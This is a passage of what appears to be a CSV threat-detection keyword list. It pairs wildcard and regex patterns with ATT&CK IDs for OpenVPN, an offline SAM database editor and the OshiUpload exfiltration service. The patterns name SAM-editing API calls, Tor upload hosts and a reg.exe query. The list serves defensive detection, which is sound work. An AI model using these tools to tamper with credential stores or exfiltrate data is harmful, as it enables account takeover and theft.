Evasion","https://openvpn.net/","1","0","N/A","N/A","6","8","N/A","N/A","N/A","N/A" "*\openvpn.exe*",".{0,1000}\\openvpn\.exe.{0,1000}","greyware_tool_keyword","OPENVPN","OpenVPN is a legitimate tool that might be used by an adversary to maintain persistence or exfiltrate data","T1071 - T1573 - T1133","TA0003 - TA0008 - TA0011","N/A","N/A","Defense Evasion","https://openvpn.net/","1","0","N/A","N/A","6","8","N/A","N/A","N/A","N/A" "*\Program Files\TAP-Windows\*",".{0,1000}\\Program\sFiles\\TAP\-Windows\\.{0,1000}","greyware_tool_keyword","OPENVPN","OpenVPN is a legitimate tool that might be used by an adversary to maintain persistence or exfiltrate data","T1071 - T1573 - T1133","TA0003 - TA0008 - TA0011","N/A","N/A","Defense Evasion","https://openvpn.net/","1","0","N/A","N/A","6","8","N/A","N/A","N/A","N/A" "*\Root\InventoryApplicationFile\tap-windows*",".{0,1000}\\Root\\InventoryApplicationFile\\tap\-windows.{0,1000}","greyware_tool_keyword","OPENVPN","OpenVPN is a legitimate tool that might be used by an adversary to maintain persistence or exfiltrate data","T1071 - T1573 - T1133","TA0003 - TA0008 - TA0011","N/A","N/A","Defense Evasion","https://openvpn.net/","1","0","N/A","N/A","6","8","N/A","N/A","N/A","N/A" "*\SOFTWARE\TAP-Windows*",".{0,1000}\\SOFTWARE\\TAP\-Windows.{0,1000}","greyware_tool_keyword","OPENVPN","OpenVPN is a legitimate tool that might be used by an adversary to maintain persistence or exfiltrate data","T1071 - T1573 - T1133","TA0003 - TA0008 - TA0011","N/A","N/A","Defense Evasion","https://openvpn.net/","1","0","N/A","N/A","6","8","N/A","N/A","N/A","N/A" "*\tap-windows-*.exe*",".{0,1000}\\tap\-windows\-.{0,1000}\.exe.{0,1000}","greyware_tool_keyword","OPENVPN","OpenVPN is a legitimate tool that might be used by an adversary to maintain persistence or exfiltrate data","T1071 - T1573 - T1133","TA0003 - TA0008 - TA0011","N/A","N/A","Defense Evasion","https://openvpn.net/","1","0","N/A","N/A","6","8","N/A","N/A","N/A","N/A" "*>the openvpn 
project<*",".{0,1000}\>the\sopenvpn\sproject\<.{0,1000}","greyware_tool_keyword","OPENVPN","OpenVPN is a legitimate tool that might be used by an adversary to maintain persistence or exfiltrate data","T1071 - T1573 - T1133","TA0003 - TA0008 - TA0011","N/A","N/A","Defense Evasion","https://openvpn.net/","1","0","N/A","N/A","6","8","N/A","N/A","N/A","N/A" "* OfflineSamTool.h*",".{0,1000}\sOfflineSamTool\.h.{0,1000}","greyware_tool_keyword","oset","Offline SAM Editor Tool to access and edit SAM databases from offline OS disk","T1078 - T1003.002 - T1547.001","TA0003 - TA0006 - TA0007 - TA0005","N/A","N/A","Credential Access","https://x.com/0gtweet/status/1817859483445461406","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*/OfflineSamTool.exe*",".{0,1000}\/OfflineSamTool\.exe.{0,1000}","greyware_tool_keyword","oset","Offline SAM Editor Tool to access and edit SAM databases from offline OS disk","T1078 - T1003.002 - T1547.001","TA0003 - TA0006 - TA0007 - TA0005","N/A","N/A","Credential Access","https://x.com/0gtweet/status/1817859483445461406","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*/oset.exe*",".{0,1000}\/oset\.exe.{0,1000}","greyware_tool_keyword","oset","Offline SAM Editor Tool to access and edit SAM databases from offline OS disk","T1078 - T1003.002 - T1547.001","TA0003 - TA0006 - TA0007 - TA0005","N/A","N/A","Credential Access","https://x.com/0gtweet/status/1817859483445461406","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*/oset.zip*",".{0,1000}\/oset\.zip.{0,1000}","greyware_tool_keyword","oset","Offline SAM Editor Tool to access and edit SAM databases from offline OS disk","T1078 - T1003.002 - T1547.001","TA0003 - TA0006 - TA0007 - TA0005","N/A","N/A","Credential Access","https://x.com/0gtweet/status/1817859483445461406","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\OfflineSamTool.exe*",".{0,1000}\\OfflineSamTool\.exe.{0,1000}","greyware_tool_keyword","oset","Offline SAM Editor Tool to access and edit SAM databases from 
offline OS disk","T1078 - T1003.002 - T1547.001","TA0003 - TA0006 - TA0007 - TA0005","N/A","N/A","Credential Access","https://x.com/0gtweet/status/1817859483445461406","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\OfflineSamTool.h*",".{0,1000}\\OfflineSamTool\.h.{0,1000}","greyware_tool_keyword","oset","Offline SAM Editor Tool to access and edit SAM databases from offline OS disk","T1078 - T1003.002 - T1547.001","TA0003 - TA0006 - TA0007 - TA0005","N/A","N/A","Credential Access","https://x.com/0gtweet/status/1817859483445461406","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\oset.exe*",".{0,1000}\\oset\.exe.{0,1000}","greyware_tool_keyword","oset","Offline SAM Editor Tool to access and edit SAM databases from offline OS disk","T1078 - T1003.002 - T1547.001","TA0003 - TA0006 - TA0007 - TA0005","N/A","N/A","Credential Access","https://x.com/0gtweet/status/1817859483445461406","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\oset.zip*",".{0,1000}\\oset\.zip.{0,1000}","greyware_tool_keyword","oset","Offline SAM Editor Tool to access and edit SAM databases from offline OS disk","T1078 - T1003.002 - T1547.001","TA0003 - TA0006 - TA0007 - TA0005","N/A","N/A","Credential Access","https://x.com/0gtweet/status/1817859483445461406","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\Root\InventoryApplicationFile\offlinesamtool*",".{0,1000}\\Root\\InventoryApplicationFile\\offlinesamtool.{0,1000}","greyware_tool_keyword","oset","Offline SAM Editor Tool to access and edit SAM databases from offline OS disk","T1078 - T1003.002 - T1547.001","TA0003 - TA0006 - TA0007 - TA0005","N/A","N/A","Credential Access","https://x.com/0gtweet/status/1817859483445461406","1","0","#registry","N/A","10","10","N/A","N/A","N/A","N/A" "*>Open Source Developer, Grzegorz Tworek<*",".{0,1000}\>Open\sSource\sDeveloper,\sGrzegorz\sTworek\<.{0,1000}","greyware_tool_keyword","oset","Offline SAM Editor Tool to access and edit SAM databases from offline OS disk","T1078 - 
T1003.002 - T1547.001","TA0003 - TA0006 - TA0007 - TA0005","N/A","N/A","Credential Access","https://x.com/0gtweet/status/1817859483445461406","1","0","#signature","N/A","10","10","N/A","N/A","N/A","N/A" "*03a3b39dd1b9bfb7421e4ba555ca9669b0e3ca7d993ce921d249493aee23b484*",".{0,1000}03a3b39dd1b9bfb7421e4ba555ca9669b0e3ca7d993ce921d249493aee23b484.{0,1000}","greyware_tool_keyword","oset","Offline SAM Editor Tool to access and edit SAM databases from offline OS disk","T1078 - T1003.002 - T1547.001","TA0003 - TA0006 - TA0007 - TA0005","N/A","N/A","Credential Access","https://x.com/0gtweet/status/1817859483445461406","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A" "*5f87b4ab00f09c64f4d30fcfbf19e9e6945971c74d28370c720e52b83f7decf3*",".{0,1000}5f87b4ab00f09c64f4d30fcfbf19e9e6945971c74d28370c720e52b83f7decf3.{0,1000}","greyware_tool_keyword","oset","Offline SAM Editor Tool to access and edit SAM databases from offline OS disk","T1078 - T1003.002 - T1547.001","TA0003 - TA0006 - TA0007 - TA0005","N/A","N/A","Credential Access","https://x.com/0gtweet/status/1817859483445461406","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A" "*62440D3B8BE22B9353AC1374CC6ED1FAF4476908FE6D8E9FBD3AA62004EFEF3E*",".{0,1000}62440D3B8BE22B9353AC1374CC6ED1FAF4476908FE6D8E9FBD3AA62004EFEF3E.{0,1000}","greyware_tool_keyword","oset","Offline SAM Editor Tool to access and edit SAM databases from offline OS disk","T1078 - T1003.002 - T1547.001","TA0003 - TA0006 - TA0007 - TA0005","N/A","N/A","Credential Access","https://x.com/0gtweet/status/1817859483445461406","1","0","#filehash","manually compiled","10","10","N/A","N/A","N/A","N/A" "*66092d1e08e55e35b60dc348f2f59d69c0768a09ce411a50fc0d161bfab3303d*",".{0,1000}66092d1e08e55e35b60dc348f2f59d69c0768a09ce411a50fc0d161bfab3303d.{0,1000}","greyware_tool_keyword","oset","Offline SAM Editor Tool to access and edit SAM databases from offline OS disk","T1078 - T1003.002 - T1547.001","TA0003 - TA0006 - TA0007 - 
TA0005","N/A","N/A","Credential Access","https://x.com/0gtweet/status/1817859483445461406","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A" "*776b64a95ccc334446805d680288c7ac35f1e938ee43115c1911f1c2fed27312*",".{0,1000}776b64a95ccc334446805d680288c7ac35f1e938ee43115c1911f1c2fed27312.{0,1000}","greyware_tool_keyword","oset","Offline SAM Editor Tool to access and edit SAM databases from offline OS disk","T1078 - T1003.002 - T1547.001","TA0003 - TA0006 - TA0007 - TA0005","N/A","N/A","Credential Access","https://x.com/0gtweet/status/1817859483445461406","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A" "*a5e57662131399ad586e4b5c4a942bc9029104331953fdbdbfd6e8a0cdad9ccc*",".{0,1000}a5e57662131399ad586e4b5c4a942bc9029104331953fdbdbfd6e8a0cdad9ccc.{0,1000}","greyware_tool_keyword","oset","Offline SAM Editor Tool to access and edit SAM databases from offline OS disk","T1078 - T1003.002 - T1547.001","TA0003 - TA0006 - TA0007 - TA0005","N/A","N/A","Credential Access","https://x.com/0gtweet/status/1817859483445461406","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A" "*b10cfda1-f24f-441b-8f43-80cb93e786ec*",".{0,1000}b10cfda1\-f24f\-441b\-8f43\-80cb93e786ec.{0,1000}","greyware_tool_keyword","oset","Offline SAM Editor Tool to access and edit SAM databases from offline OS disk","T1078 - T1003.002 - T1547.001","TA0003 - TA0006 - TA0007 - TA0005","N/A","N/A","Credential Access","https://x.com/0gtweet/status/1817859483445461406","1","0","#GUIDproject","N/A","10","10","N/A","N/A","N/A","N/A" "*C50B26839FCDA18B4DB6560EB826E94C*",".{0,1000}C50B26839FCDA18B4DB6560EB826E94C.{0,1000}","greyware_tool_keyword","oset","Offline SAM Editor Tool to access and edit SAM databases from offline OS disk","T1078 - T1003.002 - T1547.001","TA0003 - TA0006 - TA0007 - TA0005","N/A","N/A","Credential Access","https://x.com/0gtweet/status/1817859483445461406","1","0","#imphash","N/A","10","10","N/A","N/A","N/A","N/A" "*Cannot enumerate SAM 
objects*",".{0,1000}Cannot\senumerate\sSAM\sobjects.{0,1000}","greyware_tool_keyword","oset","Offline SAM Editor Tool to access and edit SAM databases from offline OS disk","T1078 - T1003.002 - T1547.001","TA0003 - TA0006 - TA0007 - TA0005","N/A","N/A","Credential Access","https://x.com/0gtweet/status/1817859483445461406","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*Error converting offlinesam path*",".{0,1000}Error\sconverting\sofflinesam\spath.{0,1000}","greyware_tool_keyword","oset","Offline SAM Editor Tool to access and edit SAM databases from offline OS disk","T1078 - T1003.002 - T1547.001","TA0003 - TA0006 - TA0007 - TA0005","N/A","N/A","Credential Access","https://x.com/0gtweet/status/1817859483445461406","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*f14052ce01a373effaf1c74eeed9ccda8ac4f6cf3407727d4a5871df9f195f57*",".{0,1000}f14052ce01a373effaf1c74eeed9ccda8ac4f6cf3407727d4a5871df9f195f57.{0,1000}","greyware_tool_keyword","oset","Offline SAM Editor Tool to access and edit SAM databases from offline OS disk","T1078 - T1003.002 - T1547.001","TA0003 - TA0006 - TA0007 - TA0005","N/A","N/A","Credential Access","https://x.com/0gtweet/status/1817859483445461406","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A" "*f9ac9d3510fb8c2a50b03605454263af27cf68ef4f27458c03b12607a0f8ebd3*",".{0,1000}f9ac9d3510fb8c2a50b03605454263af27cf68ef4f27458c03b12607a0f8ebd3.{0,1000}","greyware_tool_keyword","oset","Offline SAM Editor Tool to access and edit SAM databases from offline OS disk","T1078 - T1003.002 - T1547.001","TA0003 - TA0006 - TA0007 - TA0005","N/A","N/A","Credential Access","https://x.com/0gtweet/status/1817859483445461406","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A" "*Offline SAM Editing Tool - Changed*",".{0,1000}Offline\sSAM\sEditing\sTool\s\-\sChanged.{0,1000}","greyware_tool_keyword","oset","Offline SAM Editor Tool to access and edit SAM databases from offline OS disk","T1078 - T1003.002 - T1547.001","TA0003 - TA0006 
- TA0007 - TA0005","N/A","N/A","Credential Access","https://x.com/0gtweet/status/1817859483445461406","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*Offline SAM Editing Tool*",".{0,1000}Offline\sSAM\sEditing\sTool.{0,1000}","greyware_tool_keyword","oset","Offline SAM Editor Tool to access and edit SAM databases from offline OS disk","T1078 - T1003.002 - T1547.001","TA0003 - TA0006 - TA0007 - TA0005","N/A","N/A","Credential Access","https://x.com/0gtweet/status/1817859483445461406","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*Offline SAM loaded successfully*",".{0,1000}Offline\sSAM\sloaded\ssuccessfully.{0,1000}","greyware_tool_keyword","oset","Offline SAM Editor Tool to access and edit SAM databases from offline OS disk","T1078 - T1003.002 - T1547.001","TA0003 - TA0006 - TA0007 - TA0005","N/A","N/A","Credential Access","https://x.com/0gtweet/status/1817859483445461406","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*Offline SAM Tool\r\nUse with caution!*",".{0,1000}Offline\sSAM\sTool\\r\\nUse\swith\scaution!.{0,1000}","greyware_tool_keyword","oset","Offline SAM Editor Tool to access and edit SAM databases from offline OS disk","T1078 - T1003.002 - T1547.001","TA0003 - TA0006 - TA0007 - TA0005","N/A","N/A","Credential Access","https://x.com/0gtweet/status/1817859483445461406","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*Open Source Developer, Grzegorz Tworek*",".{0,1000}Open\sSource\sDeveloper,\sGrzegorz\sTworek.{0,1000}","greyware_tool_keyword","oset","Offline SAM Editor Tool to access and edit SAM databases from offline OS disk","T1078 - T1003.002 - T1547.001","TA0003 - TA0006 - TA0007 - TA0005","N/A","N/A","Credential Access","https://x.com/0gtweet/status/1817859483445461406","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*reg.exe query hklm ^| findstr /i \\OFFLINE'*",".{0,1000}reg\.exe\squery\shklm\s\^\|\sfindstr\s\/i\s\\\\OFFLINE\'.{0,1000}","greyware_tool_keyword","oset","Offline SAM Editor Tool to access and edit 
SAM databases from offline OS disk","T1078 - T1003.002 - T1547.001","TA0003 - TA0006 - TA0007 - TA0005","N/A","N/A","Credential Access","https://x.com/0gtweet/status/1817859483445461406","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*reg.exe query hklm ^| findstr /i \OFFLINE*",".{0,1000}reg\.exe\squery\shklm\s\^\|\sfindstr\s\/i\s\\OFFLINE.{0,1000}","greyware_tool_keyword","oset","Offline SAM Editor Tool to access and edit SAM databases from offline OS disk","T1078 - T1003.002 - T1547.001","TA0003 - TA0006 - TA0007 - TA0005","N/A","N/A","Credential Access","https://x.com/0gtweet/status/1817859483445461406","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*SamOfflineAddMemberToAlias*",".{0,1000}SamOfflineAddMemberToAlias.{0,1000}","greyware_tool_keyword","oset","Offline SAM Editor Tool to access and edit SAM databases from offline OS disk","T1078 - T1003.002 - T1547.001","TA0003 - TA0006 - TA0007 - TA0005","N/A","N/A","Credential Access","https://x.com/0gtweet/status/1817859483445461406","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*SamOfflineCloseHandle*",".{0,1000}SamOfflineCloseHandle.{0,1000}","greyware_tool_keyword","oset","Offline SAM Editor Tool to access and edit SAM databases from offline OS disk","T1078 - T1003.002 - T1547.001","TA0003 - TA0006 - TA0007 - TA0005","N/A","N/A","Credential Access","https://x.com/0gtweet/status/1817859483445461406","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*SamOfflineConnect*",".{0,1000}SamOfflineConnect.{0,1000}","greyware_tool_keyword","oset","Offline SAM Editor Tool to access and edit SAM databases from offline OS disk","T1078 - T1003.002 - T1547.001","TA0003 - TA0006 - TA0007 - TA0005","N/A","N/A","Credential Access","https://x.com/0gtweet/status/1817859483445461406","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*SamOfflineCreateAliasInDomain*",".{0,1000}SamOfflineCreateAliasInDomain.{0,1000}","greyware_tool_keyword","oset","Offline SAM Editor Tool to access and edit SAM 
databases from offline OS disk","T1078 - T1003.002 - T1547.001","TA0003 - TA0006 - TA0007 - TA0005","N/A","N/A","Credential Access","https://x.com/0gtweet/status/1817859483445461406","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*SamOfflineCreateUserInDomain*",".{0,1000}SamOfflineCreateUserInDomain.{0,1000}","greyware_tool_keyword","oset","Offline SAM Editor Tool to access and edit SAM databases from offline OS disk","T1078 - T1003.002 - T1547.001","TA0003 - TA0006 - TA0007 - TA0005","N/A","N/A","Credential Access","https://x.com/0gtweet/status/1817859483445461406","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*SamOfflineDeleteAlias*",".{0,1000}SamOfflineDeleteAlias.{0,1000}","greyware_tool_keyword","oset","Offline SAM Editor Tool to access and edit SAM databases from offline OS disk","T1078 - T1003.002 - T1547.001","TA0003 - TA0006 - TA0007 - TA0005","N/A","N/A","Credential Access","https://x.com/0gtweet/status/1817859483445461406","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*SamOfflineDeleteUser*",".{0,1000}SamOfflineDeleteUser.{0,1000}","greyware_tool_keyword","oset","Offline SAM Editor Tool to access and edit SAM databases from offline OS disk","T1078 - T1003.002 - T1547.001","TA0003 - TA0006 - TA0007 - TA0005","N/A","N/A","Credential Access","https://x.com/0gtweet/status/1817859483445461406","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*SamOfflineEnumerateAliasesInDomain*",".{0,1000}SamOfflineEnumerateAliasesInDomain.{0,1000}","greyware_tool_keyword","oset","Offline SAM Editor Tool to access and edit SAM databases from offline OS disk","T1078 - T1003.002 - T1547.001","TA0003 - TA0006 - TA0007 - TA0005","N/A","N/A","Credential Access","https://x.com/0gtweet/status/1817859483445461406","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*SamOfflineEnumerateDomainsInSamServer*",".{0,1000}SamOfflineEnumerateDomainsInSamServer.{0,1000}","greyware_tool_keyword","oset","Offline SAM Editor Tool to access and edit SAM databases 
from offline OS disk","T1078 - T1003.002 - T1547.001","TA0003 - TA0006 - TA0007 - TA0005","N/A","N/A","Credential Access","https://x.com/0gtweet/status/1817859483445461406","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*SamOfflineEnumerateUsersInDomain2*",".{0,1000}SamOfflineEnumerateUsersInDomain2.{0,1000}","greyware_tool_keyword","oset","Offline SAM Editor Tool to access and edit SAM databases from offline OS disk","T1078 - T1003.002 - T1547.001","TA0003 - TA0006 - TA0007 - TA0005","N/A","N/A","Credential Access","https://x.com/0gtweet/status/1817859483445461406","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*SamOfflineGetMembersInAlias*",".{0,1000}SamOfflineGetMembersInAlias.{0,1000}","greyware_tool_keyword","oset","Offline SAM Editor Tool to access and edit SAM databases from offline OS disk","T1078 - T1003.002 - T1547.001","TA0003 - TA0006 - TA0007 - TA0005","N/A","N/A","Credential Access","https://x.com/0gtweet/status/1817859483445461406","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*SamOfflineLookupDomainInSamServer*",".{0,1000}SamOfflineLookupDomainInSamServer.{0,1000}","greyware_tool_keyword","oset","Offline SAM Editor Tool to access and edit SAM databases from offline OS disk","T1078 - T1003.002 - T1547.001","TA0003 - TA0006 - TA0007 - TA0005","N/A","N/A","Credential Access","https://x.com/0gtweet/status/1817859483445461406","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*SamOfflineOpenDomain*",".{0,1000}SamOfflineOpenDomain.{0,1000}","greyware_tool_keyword","oset","Offline SAM Editor Tool to access and edit SAM databases from offline OS disk","T1078 - T1003.002 - T1547.001","TA0003 - TA0006 - TA0007 - TA0005","N/A","N/A","Credential Access","https://x.com/0gtweet/status/1817859483445461406","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*SamOfflineOpenUser*",".{0,1000}SamOfflineOpenUser.{0,1000}","greyware_tool_keyword","oset","Offline SAM Editor Tool to access and edit SAM databases from offline OS 
disk","T1078 - T1003.002 - T1547.001","TA0003 - TA0006 - TA0007 - TA0005","N/A","N/A","Credential Access","https://x.com/0gtweet/status/1817859483445461406","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*SamOfflineQueryInformationAlias*",".{0,1000}SamOfflineQueryInformationAlias.{0,1000}","greyware_tool_keyword","oset","Offline SAM Editor Tool to access and edit SAM databases from offline OS disk","T1078 - T1003.002 - T1547.001","TA0003 - TA0006 - TA0007 - TA0005","N/A","N/A","Credential Access","https://x.com/0gtweet/status/1817859483445461406","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*SamOfflineQueryInformationUser*",".{0,1000}SamOfflineQueryInformationUser.{0,1000}","greyware_tool_keyword","oset","Offline SAM Editor Tool to access and edit SAM databases from offline OS disk","T1078 - T1003.002 - T1547.001","TA0003 - TA0006 - TA0007 - TA0005","N/A","N/A","Credential Access","https://x.com/0gtweet/status/1817859483445461406","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*SamOfflineRemoveMemberFromAlias*",".{0,1000}SamOfflineRemoveMemberFromAlias.{0,1000}","greyware_tool_keyword","oset","Offline SAM Editor Tool to access and edit SAM databases from offline OS disk","T1078 - T1003.002 - T1547.001","TA0003 - TA0006 - TA0007 - TA0005","N/A","N/A","Credential Access","https://x.com/0gtweet/status/1817859483445461406","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*SamOfflineRidToSid*",".{0,1000}SamOfflineRidToSid.{0,1000}","greyware_tool_keyword","oset","Offline SAM Editor Tool to access and edit SAM databases from offline OS disk","T1078 - T1003.002 - T1547.001","TA0003 - TA0006 - TA0007 - TA0005","N/A","N/A","Credential Access","https://x.com/0gtweet/status/1817859483445461406","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*SamOfflineSetInformationAlias*",".{0,1000}SamOfflineSetInformationAlias.{0,1000}","greyware_tool_keyword","oset","Offline SAM Editor Tool to access and edit SAM databases from offline OS 
disk","T1078 - T1003.002 - T1547.001","TA0003 - TA0006 - TA0007 - TA0005","N/A","N/A","Credential Access","https://x.com/0gtweet/status/1817859483445461406","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*stderr.pl/oset*",".{0,1000}stderr\.pl\/oset.{0,1000}","greyware_tool_keyword","oset","Offline SAM Editor Tool to access and edit SAM databases from offline OS disk","T1078 - T1003.002 - T1547.001","TA0003 - TA0006 - TA0007 - TA0005","N/A","N/A","Credential Access","https://x.com/0gtweet/status/1817859483445461406","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "* oshi.at *",".{0,1000}\soshi\.at\s.{0,1000}","greyware_tool_keyword","OshiUpload","Ephemeral file sharing engine","T1030 - T1048 - T1078.004 - T1105 - T1567.001","TA0010","N/A","N/A","Data Exfiltration","https://github.com/somenonymous/OshiUpload","1","0","N/A","N/A","10","2","168","24","2022-10-01T04:08:29Z","2019-05-11T02:08:51Z" "* --socks5-hostname 127.0.0.1:9050*",".{0,1000}\s\-\-socks5\-hostname\s127\.0\.0\.1\:9050.{0,1000}","greyware_tool_keyword","OshiUpload","Ephemeral file sharing engine","T1030 - T1048 - T1078.004 - T1105 - T1567.001","TA0010","N/A","N/A","Data Exfiltration","https://github.com/somenonymous/OshiUpload","1","0","N/A","N/A","10","2","168","24","2022-10-01T04:08:29Z","2019-05-11T02:08:51Z" "*/oshi_run.pl*",".{0,1000}\/oshi_run\.pl.{0,1000}","greyware_tool_keyword","OshiUpload","Ephemeral file sharing engine","T1030 - T1048 - T1078.004 - T1105 - T1567.001","TA0010","N/A","N/A","Data Exfiltration","https://github.com/somenonymous/OshiUpload","1","0","N/A","N/A","10","2","168","24","2022-10-01T04:08:29Z","2019-05-11T02:08:51Z" "*/OshiUpload.git*",".{0,1000}\/OshiUpload\.git.{0,1000}","greyware_tool_keyword","OshiUpload","Ephemeral file sharing engine","T1030 - T1048 - T1078.004 - T1105 - T1567.001","TA0010","N/A","N/A","Data Exfiltration","https://github.com/somenonymous/OshiUpload","1","1","N/A","N/A","10","2","168","24","2022-10-01T04:08:29Z","2019-05-11T02:08:51Z" 
"*[info] TCP upload server started (tcp.pl)*",".{0,1000}\[info\]\sTCP\supload\sserver\sstarted\s\(tcp\.pl\).{0,1000}","greyware_tool_keyword","OshiUpload","Ephemeral file sharing engine","T1030 - T1048 - T1078.004 - T1105 - T1567.001","TA0010","N/A","N/A","Data Exfiltration","https://github.com/somenonymous/OshiUpload","1","0","N/A","N/A","10","2","168","24","2022-10-01T04:08:29Z","2019-05-11T02:08:51Z" "*1640fb593deccf72c27363463e6001a1ced831f423b00c8687555115f9365bec*",".{0,1000}1640fb593deccf72c27363463e6001a1ced831f423b00c8687555115f9365bec.{0,1000}","greyware_tool_keyword","OshiUpload","Ephemeral file sharing engine","T1030 - T1048 - T1078.004 - T1105 - T1567.001","TA0010","N/A","N/A","Data Exfiltration","https://github.com/somenonymous/OshiUpload","1","0","#filehash","N/A","10","2","168","24","2022-10-01T04:08:29Z","2019-05-11T02:08:51Z" "*5ety7tpkim5me6eszuwcje7bmy25pbtrjtue7zkqqgziljwqy3rrikqd.onion*",".{0,1000}5ety7tpkim5me6eszuwcje7bmy25pbtrjtue7zkqqgziljwqy3rrikqd\.onion.{0,1000}","greyware_tool_keyword","OshiUpload","Ephemeral file sharing engine","T1030 - T1048 - T1078.004 - T1105 - T1567.001","TA0010","N/A","N/A","Data Exfiltration","https://github.com/somenonymous/OshiUpload","1","1","N/A","N/A","10","2","168","24","2022-10-01T04:08:29Z","2019-05-11T02:08:51Z" "*ADMIN_BASICAUTH_PASSWORDHASH = f52fbd32b2b3b86ff88ef6c490628285f482af15ddcb29541f94bcf526a3f6c7*",".{0,1000}ADMIN_BASICAUTH_PASSWORDHASH\s\=\sf52fbd32b2b3b86ff88ef6c490628285f482af15ddcb29541f94bcf526a3f6c7.{0,1000}","greyware_tool_keyword","OshiUpload","Ephemeral file sharing engine","T1030 - T1048 - T1078.004 - T1105 - T1567.001","TA0010","N/A","N/A","Data Exfiltration","https://github.com/somenonymous/OshiUpload","1","0","N/A","N/A","10","2","168","24","2022-10-01T04:08:29Z","2019-05-11T02:08:51Z" "*ADMIN_ROUTE = /SuPeRsEcReTuRl/*",".{0,1000}ADMIN_ROUTE\s\=\s\/SuPeRsEcReTuRl\/.{0,1000}","greyware_tool_keyword","OshiUpload","Ephemeral file sharing engine","T1030 - T1048 - T1078.004 - T1105 
- T1567.001","TA0010","N/A","N/A","Data Exfiltration","https://github.com/somenonymous/OshiUpload","1","0","N/A","N/A","10","2","168","24","2022-10-01T04:08:29Z","2019-05-11T02:08:51Z" "*https://oshi.at/*",".{0,1000}https\:\/\/oshi\.at\/.{0,1000}","greyware_tool_keyword","OshiUpload","Ephemeral file sharing engine","T1030 - T1048 - T1078.004 - T1105 - T1567.001","TA0010","N/A","N/A","Data Exfiltration","https://github.com/somenonymous/OshiUpload","1","1","N/A","N/A","10","2","168","24","2022-10-01T04:08:29Z","2019-05-11T02:08:51Z" "*hypnotoad -s webapp.pl && sleep 5*",".{0,1000}hypnotoad\s\-s\swebapp\.pl\s\&\&\ssleep\s5.{0,1000}","greyware_tool_keyword","OshiUpload","Ephemeral file sharing engine","T1030 - T1048 - T1078.004 - T1105 - T1567.001","TA0010","N/A","N/A","Data Exfiltration","https://github.com/somenonymous/OshiUpload","1","0","N/A","N/A","10","2","168","24","2022-10-01T04:08:29Z","2019-05-11T02:08:51Z" "*oshi.at/onion*",".{0,1000}oshi\.at\/onion.{0,1000}","greyware_tool_keyword","OshiUpload","Ephemeral file sharing engine","T1030 - T1048 - T1078.004 - T1105 - T1567.001","TA0010","N/A","N/A","Data Exfiltration","https://github.com/somenonymous/OshiUpload","1","1","N/A","N/A","10","2","168","24","2022-10-01T04:08:29Z","2019-05-11T02:08:51Z" "*oshiatwowvdbshka.onion*",".{0,1000}oshiatwowvdbshka\.onion.{0,1000}","greyware_tool_keyword","OshiUpload","Ephemeral file sharing engine","T1030 - T1048 - T1078.004 - T1105 - T1567.001","TA0010","N/A","N/A","Data Exfiltration","https://github.com/somenonymous/OshiUpload","1","1","N/A","N/A","10","2","168","24","2022-10-01T04:08:29Z","2019-05-11T02:08:51Z" "*OshiUpload/app*",".{0,1000}OshiUpload\/app.{0,1000}","greyware_tool_keyword","OshiUpload","Ephemeral file sharing engine","T1030 - T1048 - T1078.004 - T1105 - T1567.001","TA0010","N/A","N/A","Data Exfiltration","https://github.com/somenonymous/OshiUpload","1","0","N/A","N/A","10","2","168","24","2022-10-01T04:08:29Z","2019-05-11T02:08:51Z" 
